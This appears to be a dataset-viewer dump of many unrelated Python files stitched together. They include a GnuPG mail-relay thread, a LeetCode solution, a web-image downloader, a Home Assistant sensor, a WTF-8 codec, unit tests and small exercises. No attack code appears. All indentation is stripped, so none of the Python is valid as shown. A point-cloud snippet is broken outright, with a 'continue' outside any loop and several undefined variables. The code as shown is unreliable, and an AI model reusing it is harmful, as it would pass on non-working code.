self.gnupg = GnuPGManager.GnuPGManager(homeTmp='/tmp/.gnupgMTA')
self.timestamp = datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p")
self.distAddr = distAddr
self.senderAddr = senderAddr
self.userInfoTmp = userInfo
self.distKeyIDSig = distKeyIDSig
self.distKeys = distKeys
self.addrMsgDict = addrMsgDict
self.addrFingerprintKeyInf = addrFingerprintKeyInf
self.sleepCounter = 0
self.retryFirst = False
self.recipientIsSenderFlag = False
"""
Logging only for server-side errors to trace problems.
"""
self.__logger = GnuPGSystemLogger('mtaSendThread')
def get_recipient_is_sender_flag(self):
return self.__recipientIsSenderFlag
def get_timestamp(self):
return self.__timestamp
def get_dist_addr(self):
return self.__distAddr
def get_sender_addr(self):
return self.__senderAddr
def get_user_info(self):
return self.__userInfo
def get_dist_key_idsig(self):
return self.__distKeyIDSig
def get_dist_keys(self):
return self.__distKeys
def get_addr_msg_dict(self):
return self.__addrMsgDict
def get_addr_fingerprint_key_inf(self):
return self.__addrFingerprintKeyInf
def get_sleep_counter(self):
return self.__sleepCounter
def get_retry_first(self):
return self.__retryFirst
def set_recipient_is_sender_flag(self, value):
self.__recipientIsSenderFlag = value
def set_timestamp(self, value):
self.__timestamp = value
def set_dist_addr(self, value):
self.__distAddr = value
def set_sender_addr(self, value):
self.__senderAddr = value
def set_user_info(self, value):
self.__userInfo = value
def set_dist_key_idsig(self, value):
self.__distKeyIDSig = value
def set_dist_keys(self, value):
self.__distKeys = value
def set_addr_msg_dict(self, value):
self.__addrMsgDict = value
def set_addr_fingerprint_key_inf(self, value):
self.__addrFingerprintKeyInf = value
def set_sleep_counter(self, value):
self.__sleepCounter = value
def set_retry_first(self, value):
self.__retryFirst = value
def run(self):
threading.Thread.run(self)
self.__sendAllMessages()
def __sendAllMessages(self):
"""
Iterates over the address-message-dictionary and send the message to the address.
If it was not possible to send messages, the thread will first sleep __RETRY_FIRST_TIME
and try it again. If it was not possible again for some messages it will sleep __RETRY_ELSE_TIME
until __SENDER_MSG_TIME is reached. Then the origin sender need to be informed.
1. case: If the address-message-dictionary is set, the origin message is re-encrypted.
2. case: If the address-message-dictionary is not set, the origin message is another message
and has his own user-information. Then the address-message-dictionary will be created (signed and
encrypted if it is possible or only signed).
"""
#If the origin mail was re-encrypted, addrMsgDict is not None.
#Otherwise it needs to be created from one the prepare methods.
if not self.get_addr_msg_dict():
if self.get_addr_fingerprint_key_inf():
self.__prepareSigAndEncMsg()
else:
self.__prepareSigMsg()
addrMsgNotEmpty = True
addrMsgDictTmp = self.get_addr_msg_dict().copy()
while addrMsgNotEmpty:
for recipientAddr, mail in addrMsgDictTmp.items():
sended = self.__sendToMTA(recipientAddr, mail)
if sended:
del self.get_addr_msg_dict()[recipientAddr]
if self.get_addr_msg_dict():
if not self.get_retry_first():
time.sleep(MTASendThread.__RETRY_FIRST_TIME)
self.set_retry_first(True)
else:
if self.get_sleep_counter() * MTASendThread.__RETRY_ELSE_TIME == MTASendThread.__SENDER_MSG_TIME:
addrMsgNotEmpty = False
#If the recipient is the same as the sender it doesn't need to try it again.
if (not self.get_recipient_is_sender_flag()) and recipientAddr != self.get_sender_addr():
self.set_recipient_is_sender_flag(True)
self.__prepareErrorMSGForSender()
self.set_sleep_counter(0)
self.__logger.logError('COULD NOT SEND ALL MESSAGES TO RECIPIENTS\n' +
'SEND AN INFORMATION MESSAGE TO SENDER')
self.__sendAllMessages()
else:
time.sleep(MTASendThread.__RETRY_ELSE_TIME)
self.set_sleep_counter(self.get_sleep_counter() + 1)
else:
addrMsgNotEmpty = False
def __prepareSigAndEncMsg(self):
"""
Prepare a signed and encrypted message for the sender of the mail. It creates an
address-message-dictionary: {mail-address : signed and encrypted message}.
"""
try:
#It is necessary to send the distributer keys in the attachment.
if _util.objectsNotNone(self.get_dist_key_idsig(), self.get_dist_keys()):
msg = _util.generateMIMEMsg('mixed', self.get_dist_keys(), None, None, None, None, optinal=self.get_user_info())
else:
msg = _util.generateMIMEMsg('plain', self.get_user_info(), None, None, None, None)
if self.get_dist_key_idsig() is None:
(_distKeyIDEnc, distKeyIDSig) = self.gnupg.getKeyIDsFromDist(self.get_dist_addr())
self.set_dist_key_idsig(distKeyIDSig)
MTASendThread.__SIGN_AND_ENCRYPTLOCK.acquire()
addressMsgDict = self.gnupg.signAndEncrypt(self.get_addr_fingerprint_key_inf(), self.get_sender_addr(), msg, self.get_dist_addr(), '', self.get_dist_key_idsig())
MTASendThread.__SIGN_AND_ENCRYPTLOCK.release()
except NoDistributerKeyIDsException:
addressMsgDict = {}
userInfo = self.get_user_info() + '\nNO WAY TO SIGN AND ENCRYPT THIS MESSAGE' + '\nPLEASE CONTACT THE ADMINISTRATOR'
msg = _util.generateMIMEMsg('plain', userInfo, None, self.get_dist_addr(), self.get_sender_addr(), None)
addressMsgDict[self.get_sender_addr()] = msg
self.set_addr_msg_dict(addressMsgDict)
def __prepareSigMsg(self):
"""
Prepare a signed message, if any exception occurred in the process and it was not possible
to get informations about the sender of the mail to encrypt that message. It creates an address-
message-dictionary: {mail-address : signed message}
"""
try:
userInfoTmp = 'FIRST ERROR: ' + self.get_user_info()
addressMsgDict = {}
if self.get_dist_key_idsig() is None:
(_distKeyIDEnc, distKeyIDSig) = self.gnupg.getKeyIDsFromDist(self.get_dist_addr())
self.set_dist_key_idsig(distKeyIDSig)
userInfoTmp = userInfoTmp + '\nNO WAY TO ENCRYPT THIS MESSAGE' + '\nMAYBE YOU NEED TO CONTACT THE ADMINISTRATOR'
msg = _util.generateMIMEMsg('plain', userInfoTmp, None, None, None, None)
signature = self.gnupg.signMsg(msg, self.get_dist_key_idsig())
msgSig = _util.generateMIMEMsg('signed', msg, signature, self.get_dist_addr(), self.get_sender_addr(), '')
addressMsgDict[self.get_sender_addr()] = msgSig
except (NoDistributerKeyIDsException, SigningException) as e:
userInfoTmp = userInfoTmp + ' \nNO WAY TO SIGN AND ENCRYPT THIS MESSAGE: ' + e.__str__() + '\nPLEASE CONTACT THE ADMINISTRATOR'
msg = _util.generateMIMEMsg('plain', userInfoTmp, None, self.get_dist_addr(), self.get_sender_addr(), None)
addressMsgDict[self.get_sender_addr()] = msg
self.set_addr_msg_dict(addressMsgDict)
def __prepareErrorMSGForSender(self):
"""
If it was not possible to send the re-encrypted mail to some of the recipients of the
distributer, it is necessary to inform the origin sender.
"""
dm = DistributerManager.DistributerManager()
dkm = DistributerKeyManager.DistributerKeyManager()
userInfo = 'YOUR MESSAGE FROM ' + self.get_timestamp() + ' COULD NOT SEND TO ' + ', '.join(list(self.get_addr_msg_dict().keys()))
self.set_user_info(userInfo)
self.set_dist_keys(None)
addrFingerprintKeyInf = {}
try:
senderFingerprint = dm.getFingerprint(self.get_sender_addr(), self.get_dist_addr())
senderKey = dkm.getKeyFromUser(senderFingerprint)
addrFingerprintKeyInf[self.get_sender_addr()] = (senderFingerprint, senderKey)
self.set_addr_fingerprint_key_inf(addrFingerprintKeyInf)
self.__prepareSigAndEncMsg()
except (InvalidDistributerAddressException, NoFingerprintException, DBConnectionException, NoKeyException):
self.__prepareSigMsg()
def __sendToMTA(self, recipientAddr, mail):
"""
Send the message to the MTA of the recipient's mail provider. If it failed, it will be logged.
@param recipientAddr: Mail address of the recipient.
@param mail: The MIME-mail to send to the recipient.
"""
server = None
counter = 0
try:
records = _util.getMXRecords(recipientAddr)
for rec in records:
domain = str(rec.exchange)
server = smtplib.SMTP(domain)
#server.set_debuglevel(1)
server.starttls()
try:
server.sendmail(self.get_dist_addr(), recipientAddr, mail.as_string())
break
except (SMTPSenderRefused, SMTPRecipientsRefused, SMTPDataError) as e:
"""
No sendmail possible
"""
self.__logger.logError(e.__str__())
counter += 1
if counter == len(records):
return False
return True
except NoMXRecordException as e:
"""
Could not solve the MX-Record.
"""
self.__logger.logError(e.__str__())
except socket.gaierror as e:
"""
No SMTP instance.
"""
self.__logger.logError(e.__str__())
except (RuntimeError, ValueError) as e:
"""
No STARTTLS possible
"""
self.__logger.logError(e.__str__())
finally:
if server is not None:
server.quit()
return False
timestamp = property(get_timestamp, set_timestamp, None, None)
distAddr = property(get_dist_addr, set_dist_addr, None, None)
senderAddr = property(get_sender_addr, set_sender_addr, None, None)
userInfoTmp = property(get_user_info, set_user_info, None, None)
distKeyIDSig = property(get_dist_key_idsig, set_dist_key_idsig, None, None)
distKeys = property(get_dist_keys, set_dist_keys, None, None)
addrMsgDict = property(get_addr_msg_dict, set_addr_msg_dict, None, None)
addrFingerprintKeyInf = property(get_addr_fingerprint_key_inf, set_addr_fingerprint_key_inf, None, None)
sleepCounter = property(get_sleep_counter, set_sleep_counter, None, None)
retryFirst = property(get_retry_first, set_retry_first, None, None)
recipientIsSenderFlag = property(get_recipient_is_sender_flag, set_recipient_is_sender_flag, None, None)
|
'''
## Questions
### 189. [Rotate Array](https://leetcode.com/problems/rotate-array/)
Given an array, rotate the array to the right by k steps, where k is non-negative.
Example 1:
Input: [1,2,3,4,5,6,7] and k = 3
Output: [5,6,7,1,2,3,4]
Explanation:
rotate 1 steps to the right: [7,1,2,3,4,5,6]
rotate 2 steps to the right: [6,7,1,2,3,4,5]
rotate 3 steps to the right: [5,6,7,1,2,3,4]
Example 2:
Input: [-1,-100,3,99] and k = 2
Output: [3,99,-1,-100]
Explanation:
rotate 1 steps to the right: [99,-1,-100,3]
rotate 2 steps to the right: [3,99,-1,-100]
Note:
Try to come up as many solutions as you can, there are at least 3 different ways to solve this problem.
Could you do it in-place with O(1) extra space?
'''
## Solutions
class Solution:
def rotate(self, nums: List[int], k: int) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
nums.reverse()
while k > 0:
nums.append(nums.pop(0))
k = k - 1
nums.reverse()
# Runtime: 80 ms
# Memory Usage: 13.4 MB
|
# encoding: utf-8
"""Gevent-based WSGI server adapter."""
# ## Imports
from __future__ import unicode_literals, print_function
from gevent.pywsgi import WSGIServer
# ## Server Adapter
def serve(application, host='127.0.0.1', port=8080):
"""Gevent-based WSGI-HTTP server."""
# Instantiate the server with a host/port configuration and our application.
WSGIServer((host, int(port)), application).serve_forever()
|
#!/usr/bin/env python
"""
tools and basic classes
"""
import os
# import random
# from abc import ABC
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs
# from html.entities import name2codepoint
import requests
# import time
import sys
USER_AGENT = (
'Mozilla/5.0 (Linux; Android 4.4.2; Nexus 4 Build/KOT49H) '
'AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/34.0.1847.114 Mobile Safari/537.36'
)
def get_attr(attrs: list, attr: str):
for attr_name, attr_value in attrs:
if attr_name == attr:
return attr_value
return None
def get_page(page, headers=False, cookies=False):
""" get page """
if cookies:
_cookies = cookies
else:
_cookies = dict()
if headers:
_headers = headers
else:
_headers = {
'user-agent': USER_AGENT,
'referer': page,
}
request = requests.get(
page,
headers=_headers,
cookies=_cookies,
)
return request.text
def save_file(file_url:str, dst_dir:str):
if not os.path.isdir(dst_dir):
os.mkdir(dst_dir)
dst_file_name = os.path.join(
dst_dir,
os.path.basename(urlparse(file_url).path))
if os.path.exists(dst_file_name):
return dst_file_name, 0, 'already downloaded'
try:
request_image = requests.get(file_url, stream=True, headers={'user-agent': USER_AGENT,})
except requests.exceptions.ConnectionError:
return dst_file_name, -1, 'connection error'
if request_image.status_code == 200:
with open(dst_file_name, 'wb') as f:
for chunk in request_image:
f.write(chunk)
return dst_file_name, request_image.status_code, request_image.reason
def get_file_name(file_path):
(head, tail) = os.path.split(file_path)
(file_name, ext) = os.path.splitext(tail)
return file_name
class ImageSite:
def __init__(self, start_page, parser):
self.start_page = start_page
self.parser = parser
# Print iterations progress
def printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█', printEnd = "\r"):
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
length - Optional : character length of bar (Int)
fill - Optional : bar fill character (Str)
printEnd - Optional : end character (e.g. "\r", "\r\n") (Str)
"""
percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))
filledLength = int(length * iteration // total)
bar = fill * filledLength + '-' * (length - filledLength)
print(f'\r{prefix} |{bar}| {percent}% {suffix}', end = printEnd)
# Print New Line on Complete
if iteration == total:
print()
if __name__ == '__main__':
print('imggetter classes and tools')
try:
print(save_file(sys.argv[1], 'tmp'))
except IndexError:
print(save_file('https://cdn.imagefap.com/images/full/63/710/710717099.jpg?end=1614172686&secure=0715f1e51a9ff08dc66bf', 'tmp'))
|
ctx.addClock ("clk", 12)
#ctx.addClock ("clk20", 19.875)
ctx.addClock ("clk33", 33)
|
from django.conf.urls import url
from wagtailvideos.views import chooser, multiple, videos
app_name = 'wagtailvideos'
urlpatterns = [
url(r'^$', videos.index, name='index'),
url(r'^(\d+)/$', videos.edit, name='edit'),
url(r'^(\d+)/delete/$', videos.delete, name='delete'),
url(r'^(\d+)/create_transcode/$', videos.create_transcode, name='create_transcode'),
url(r'^add/$', videos.add, name='add'),
url(r'^usage/(\d+)/$', videos.usage, name='video_usage'),
url(r'^multiple/add/$', multiple.add, name='add_multiple'),
url(r'^multiple/(\d+)/$', multiple.edit, name='edit_multiple'),
url(r'^multiple/(\d+)/delete/$', multiple.delete, name='delete_multiple'),
url(r'^chooser/$', chooser.chooser, name='chooser'),
url(r'^chooser/(\d+)/$', chooser.video_chosen, name='video_chosen'),
url(r'^chooser/upload/$', chooser.chooser_upload, name='chooser_upload'),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author: Florian Timm
@version: 2017.12.12
"""
import os
import signal
import socket
from datetime import datetime
from multiprocessing import Process
from vdInterface import VdInterface
class VdBuffer(Process):
""" process for buffering binary data """
def __init__(self, master):
"""
Constructor
:param master: instance of VdAutoStart
:type master: VdAutoStart
"""
# constructor of super class
Process.__init__(self)
# safe pipes
# self.__master = master
self.__go_on_buffering = master.go_on_buffer
self.__scanner_status = master.scanner_status
self.__datasets = master.dataset_cnt
self.__queue = master.queue
self.__admin = master.admin
self.__date = master.date
self.__conf = master.conf
self.__file_no = 0
@staticmethod
def __signal_handler(sig_no, frame):
"""
handles SIGINT-signal
:param sig_no: signal number
:type sig_no: int
:param frame:execution frame
:type frame: frame
"""
del sig_no, frame
# self.master.end()
print("SIGINT vdBuffer")
def __new_folder(self):
""" creates data folder """
# checks time for file name and runtime
self.__date.value = datetime.now()
dir = self.__conf.get("file", "namePre")
dir += self.__date.value.strftime(
self.__conf.get("file", "timeFormat"))
self.__folder = dir + "/_buffer"
# make folder
os.makedirs(self.__folder)
os.makedirs(dir + "/_transformed")
print("Data folder: " + self.__folder)
def run(self):
""" starts buffering process """
signal.signal(signal.SIGINT, self.__signal_handler)
# open socket to scanner
sock = VdInterface.get_data_stream(self.__conf)
self.__scanner_status.value = "Socket connected"
buffer = b''
datasets_in_buffer = 0
self.__datasets.value = 0
# process priority
if self.__admin:
os.nice(-18)
transformer = self.__conf.get(
"functions",
"activateTransformer") == "True"
measurements_per_dataset = int(self.__conf.get(
"device", "valuesPerDataset"))
bufferTakt = int(self.__conf.get(
"file", "takt"))
sock.settimeout(1)
while self.__go_on_buffering.value:
try:
# get data from scanner
data = sock.recvfrom(1248)[0]
if datasets_in_buffer == 0 and self.__file_no == 0:
self.__new_folder()
# RAM-buffer
buffer += data
datasets_in_buffer += 1
self.__datasets.value += measurements_per_dataset
# safe data to file every 1500 datasets
# (about 5 or 10 seconds)
if (datasets_in_buffer >= bufferTakt) or \
(not self.__go_on_buffering.value):
# write file
f = open(
self.__folder + "/" + str(self.__file_no) + ".bin",
"wb")
f.write(buffer)
f.close()
if transformer:
self.__queue.put(f.name)
# clear buffer
buffer = b''
datasets_in_buffer = 0
# count files
self.__file_no += 1
if data == 'QUIT':
break
except socket.timeout:
print("No data")
continue
sock.close()
self.__scanner_status.value = "recording stopped"
print("Disconnected!")
|
"""
Support for Tellstick sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.tellstick/
"""
import logging
from collections import namedtuple
import homeassistant.util as util
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
DatatypeDescription = namedtuple("DatatypeDescription", ['name', 'unit'])
REQUIREMENTS = ['tellcore-py==1.1.2']
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup Tellstick sensors."""
import tellcore.telldus as telldus
import tellcore.constants as tellcore_constants
sensor_value_descriptions = {
tellcore_constants.TELLSTICK_TEMPERATURE:
DatatypeDescription(
'temperature', config.get('temperature_scale', TEMP_CELSIUS)),
tellcore_constants.TELLSTICK_HUMIDITY:
DatatypeDescription('humidity', '%'),
tellcore_constants.TELLSTICK_RAINRATE:
DatatypeDescription('rain rate', ''),
tellcore_constants.TELLSTICK_RAINTOTAL:
DatatypeDescription('rain total', ''),
tellcore_constants.TELLSTICK_WINDDIRECTION:
DatatypeDescription('wind direction', ''),
tellcore_constants.TELLSTICK_WINDAVERAGE:
DatatypeDescription('wind average', ''),
tellcore_constants.TELLSTICK_WINDGUST:
DatatypeDescription('wind gust', '')
}
try:
core = telldus.TelldusCore()
except OSError:
logging.getLogger(__name__).exception(
'Could not initialize Tellstick.')
return
sensors = []
datatype_mask = util.convert(config.get('datatype_mask'), int, 127)
for ts_sensor in core.sensors():
try:
sensor_name = config[ts_sensor.id]
except KeyError:
if util.convert(config.get('only_named'), bool, False):
continue
sensor_name = str(ts_sensor.id)
for datatype in sensor_value_descriptions:
if datatype & datatype_mask and ts_sensor.has_value(datatype):
sensor_info = sensor_value_descriptions[datatype]
sensors.append(
TellstickSensor(
sensor_name, ts_sensor, datatype, sensor_info))
add_devices(sensors)
class TellstickSensor(Entity):
"""Representation of a Tellstick sensor."""
def __init__(self, name, sensor, datatype, sensor_info):
"""Initialize the sensor."""
self.datatype = datatype
self.sensor = sensor
self._unit_of_measurement = sensor_info.unit or None
self._name = "{} {}".format(name, sensor_info.name)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self.sensor.value(self.datatype).value
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
|
# -*- coding: utf-8 -*-
# To the extent possible under law, the author of this work, Konstantinos
# Koukopoulos, has waived all copyright and related or neighboring rights to
# "Python codec for Wobbly Transformation Format - 8-bit (WTF-8)". It is
# dedicated to the public domain, as described in:
# http://creativecommons.org/publicdomain/zero/1.0/
# This work is published from Greece and is available here:
# https://gist.github.com/kouk/d4e1faababf14b09b27f
from __future__ import unicode_literals, print_function
import six
import sys
import codecs
def encode(input, errors='strict'):
""" convert from unicode text (with possible UTF-16 surrogates) to wtf-8
encoded bytes. If this is a python narrow build this will actually
produce UTF-16 encoded unicode text (e.g. with surrogates).
"""
# method to convert surrogate pairs to unicode code points permitting
# lone surrogate pairs (aka potentially ill-formed UTF-16)
def to_code_point(it):
hi = None
try:
while True:
c = ord(next(it))
if c >= 0xD800 and c <= 0xDBFF: # high surrogate
hi = c
c = ord(next(it))
if c >= 0xDC00 and c <= 0xDFFF: # paired
c = 0x10000 + ((hi - 0xD800) << 10) + (c - 0xDC00)
else:
yield hi
hi = None
yield c
except StopIteration:
if hi is not None:
yield hi
buf = six.binary_type()
for code in to_code_point(iter(input)):
if (0 == (code & 0xFFFFFF80)):
buf += six.int2byte(code)
continue
elif (0 == (code & 0xFFFFF800)):
buf += six.int2byte(((code >> 6) & 0x1F) | 0xC0)
elif (0 == (code & 0xFFFF0000)):
buf += six.int2byte(((code >> 12) & 0x0F) | 0xE0)
buf += six.int2byte(((code >> 6) & 0x3F) | 0x80)
elif (0 == (code & 0xFF300000)):
buf += six.int2byte(((code >> 18) & 0x07) | 0xF0)
buf += six.int2byte(((code >> 12) & 0x3F) | 0x80)
buf += six.int2byte(((code >> 6) & 0x3F) | 0x80)
buf += six.int2byte((code & 0x3F) | 0x80)
return buf, len(buf)
def decode(input, errors='strict'):
""" convert from wtf-8 encoded bytes to unicode text.
If this is a python narrow build this will actually
produce UTF-16 encoded unicode text (e.g. with surrogates).
"""
buf = []
try:
it = six.iterbytes(input)
c = None
while True:
c = next(it)
if c < 0x80:
pass
elif c < 0xE0:
c = (((c & 0x1F) << 6) +
(next(it) & 0x3F))
elif c >= 0xE0 and c <= 0xEF:
c = (((c & 0x0F) << 12) +
((next(it) & 0x3F) << 6) +
(next(it) & 0x3F))
elif c >= 0xF0 and c <= 0xF4:
c = (((c & 0x07) << 18) +
((next(it) & 0x3F) << 12) +
((next(it) & 0x3F) << 6) +
(next(it) & 0x3F))
if c >= sys.maxunicode: # use a surrogate pair
buf.append(((c - 0x10000) >> 10) + 0xD800)
c = ((c - 0x10000) & 0x3FF) + 0xDC00
else:
raise ValueError("Invalid wtf sequence")
buf.append(c)
c = None
except StopIteration:
if c is not None:
raise ValueError("Malformed WTF-8 sequence")
return six.text_type().join(map(six.unichr, buf)), len(buf)
class StreamWriter(codecs.StreamWriter):
encode = encode
class StreamReader(codecs.StreamReader):
decode = decode
def find_codec(codec_name):
if codec_name.lower() == 'wtf-8':
return (encode, decode, StreamReader, StreamWriter)
return None
codecs.register(find_codec)
if __name__ == "__main__":
codecs.register(
lambda name: codecs.lookup('utf-8') if name == 'cp65001' else None)
msg = "I \u2665 Unicode. Even broken \ud800 Unicode."
assert msg == msg.encode('wtf-8').decode('wtf-8')
msg += "And high code points \U0001F62A. And γκρήκ τέξτ."
assert msg == msg.encode('wtf-8').decode('wtf-8')
|
class PointCloud:
def __init__(self, ptsDir, camera=0):
self.ptsDir = ptsDir
self.camera = camera
self.w = 1408
self.h = 376
def loadPointCloud(self, frame):
labelDir = '%s/annotation_%010d_%d_m.dat' % (self.ptsDir, frame, self.camera)
print 'Processing %010d' %(f)
if not (os.path.isfile(labelDir)):
print ' annotation file doesnt exist'
continue
img = Image.new('RGB', [w, h])
imgDL = Image.new('RGB', [w, h])
labels = tuple(open(labelDir, 'r'))
unarySparse = []
sparseLabel2D = []
offset = 6
tupleNum = 3
for l in labels:
s = ([float(n) for n in l.split()])
if (s[offset] != 0):
yy = int(math.floor(s[0]/w))
xx = int(s[0] % w)
numCandidate = (len(s)-offset)/tupleNum
# only feed for training when there is only one point
candidate = []
for i in range(numCandidate):
# skip the undefined label
if int(s[i*tupleNum+1+offset])-1 != priority.shape[0]:
candidate.append(int(s[i*tupleNum+1+offset])-1)
if not candidate:
continue
index = random.sample(candidate, 1)
if numCandidate>1:
subprior = priority[np.ix_(candidate, candidate)]
if np.std(subprior.flatten()) != 0:
midx = np.argmax(np.sum(subprior, axis=1) )
index[0] = candidate[midx]
img.putpixel((xx, yy), (colorMap[index[0]+1][0], colorMap[index[0]+1][1], colorMap[index[0]+1][2]))
# take it for training only when there is no ambuity
if np.std(candidate)==0:
imgDL.putpixel((xx, yy), (colorMap[candidate[0]+1][0], colorMap[candidate[0]+1][1], colorMap[candidate[0]+1][2]))
if __name__=='__main__':
pcd = PointCloud('')
|
""" Escribir un programa que pregunte al usuario los números ganadores de la lotería primitiva, los almacene
en una lista y los muestre por pantalla ordenados de menor a mayor. """
num = []
x = int(input("Cuantos numero registrara? "))
while x != 0:
numero = int(input("Numero loteria: "))
num.append(numero)
if x != 0:
x = x-1
ordenados = sorted(num)
print("numero: {}".format(ordenados))
|
#!/usr/bin/env python
"""Unit tests for M2Crypto.BIO.MemoryBuffer.
Copyright (c) 2000 Ng Pheng Siong. All rights reserved."""
import os
import multiprocessing
from M2Crypto.BIO import MemoryBuffer
from tests import unittest
class TimeLimitExpired(Exception):
pass
def time_limit(timeout, func, exc_msg, *args, **kwargs):
p = multiprocessing.Process(target=func)
p.start()
p.join(timeout)
if p.is_alive():
p.terminate()
raise TimeLimitExpired(exc_msg)
class MemoryBufferTestCase(unittest.TestCase):
def setUp(self):
self.data = b'abcdef' * 64
def tearDown(self):
pass
def test_init_empty(self):
mb = MemoryBuffer()
self.assertEqual(len(mb), 0)
out = mb.read()
assert out is None
def test_init_empty_cm(self):
with MemoryBuffer() as mb:
self.assertEqual(len(mb), 0)
out = mb.read()
assert out is None
def test_init_something(self):
mb = MemoryBuffer(self.data)
self.assertEqual(len(mb), len(self.data))
out = mb.read()
self.assertEqual(out, self.data)
def test_init_something_result_bytes(self):
mb = MemoryBuffer(self.data)
self.assertEqual(len(mb), len(self.data))
out = mb.read()
self.assertIsInstance(out, bytes)
def test_init_something_cm(self):
with MemoryBuffer(self.data) as mb:
self.assertEqual(len(mb), len(self.data))
out = mb.read()
self.assertEqual(out, self.data)
def test_read_less_than(self):
chunk = len(self.data) - 7
mb = MemoryBuffer(self.data)
out = mb.read(chunk)
self.assertEqual(out, self.data[:chunk])
self.assertEqual(len(mb), (len(self.data)) - chunk)
def test_read_more_than(self):
chunk = len(self.data) + 8
mb = MemoryBuffer(self.data)
out = mb.read(chunk)
self.assertEqual(out, self.data)
self.assertEqual(len(mb), 0)
def test_write_close(self):
mb = MemoryBuffer(self.data)
assert mb.writeable()
mb.write_close()
assert mb.readable()
with self.assertRaises(IOError):
mb.write(self.data)
assert not mb.writeable()
def test_closed(self):
mb = MemoryBuffer(self.data)
mb.close()
with self.assertRaises(IOError):
mb.write(self.data)
assert mb.readable() and not mb.writeable()
def test_readline(self):
# test against possible endless loop
# http://stackoverflow.com/questions/9280550/
timeout_secs = 10
time_limit(timeout_secs, run_test,
'The readline() should not timeout!')
def run_test(*args, **kwargs):
sep = os.linesep.encode()
with MemoryBuffer(b'hello\nworld\n') as mb:
assert mb.readable()
assert mb.readline() == b'hello' + sep
assert mb.readline() == b'world' + sep
with MemoryBuffer(b'hello\nworld\n') as mb:
assert mb.readlines() == [b'hello' + sep, b'world' + sep]
def suite():
return unittest.TestLoader().loadTestsFromTestCase(MemoryBufferTestCase)
if __name__ == '__main__':
unittest.TextTestRunner().run(suite())
|
from pydantic import BaseModel
class A(BaseModel):
cde: str
xyz: str
class B(A):
cde: int
xyz: str
A(cde='abc', xyz='123')
B(cde='abc', xyz='123')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.